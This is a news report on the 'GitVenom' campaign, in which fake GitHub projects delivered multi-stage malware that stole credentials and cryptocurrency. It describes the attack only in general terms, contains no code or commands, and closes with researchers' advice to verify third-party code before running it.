CAS Corporation reported on the 28th that it discovered a multi-level malware called 'GitVenom' on GitHub. This malware was used to steal personal data and Bitcoin worth $485,000, and it was analyzed to have spread through fake projects uploaded to GitHub.
The Global Research and Analysis Team (GReAT) of CAS Corporation confirmed several infected projects, including an Instagram account automation tool, a Bitcoin (BTC) wallet management Telegram bot, and a game Valorant crack tool. However, all of these projects were fake, and the attacker caused harm by intercepting cryptocurrency wallet addresses from the clipboard or stealing financial data. The investigation revealed that the attackers stole 5 Bitcoins. The infected repositories were used worldwide, particularly with many cases of damage in Brazil, Turkey, and Russia.
The malicious repositories uploaded to GitHub spread by using project descriptions that appear to be generated by AI to enhance their credibility. Once the victim executes the code in those repositories, they become infected with malware, allowing the attacker to control the device remotely.
This malware was written in various programming languages, including Python, JavaScript, C, C++, and C#. The infected projects download and execute malicious components from GitHub repositories and have the capability to collect the victim's passwords, bank account information, stored credentials, cryptocurrency wallet data, and browsing history. The stolen data is compressed into a .7z archive and sent to the attacker via Telegram.
Additionally, the downloaded malware includes a clipboard hijacker function, which automatically changes the cryptocurrency wallet address to an address controlled by the attacker when the victim copies it. In fact, it has been confirmed that approximately 5 BTC was deposited into the Bitcoin wallet used by the attacker as of November 2024.
Heo Yoon, the head of CAS Corporation's Korea branch, noted that "the GitVenom campaign shows that the strategies of cybercriminals who exploit GitHub to distribute sophisticated multi-level malware are becoming increasingly advanced," and added, "Developers, gamers, and cryptocurrency investors must thoroughly verify third-party code before execution, and organizations should also implement strong security controls to detect and block unauthorized code execution."
Georgy Kuchelin, a security researcher at CAS Corporation's GReAT, stated that "code-sharing platforms like GitHub are used by millions of developers worldwide, so there is a high likelihood that threat actors will continue to attempt infections using fake software in the future," and advised, "Before executing third-party code, it is essential to thoroughly analyze what the code does to identify fake projects and prevent malicious code from compromising the development environment."